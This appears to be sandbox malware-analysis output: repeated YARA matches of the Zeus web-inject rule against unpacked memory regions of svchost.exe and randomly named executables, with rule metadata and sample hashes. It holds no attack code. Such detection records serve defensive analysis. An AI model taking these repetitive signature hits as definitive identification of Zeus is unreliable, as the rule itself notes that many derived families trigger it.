Source: 2.3.svchost.exe.43c0000.51.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.69.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.69.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.57.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.76.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.72.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.56.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.73.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.64.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.74.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e040000.40.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.53.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.55.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.80.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.66.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.24a6c00.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.26a3c00.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2452000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
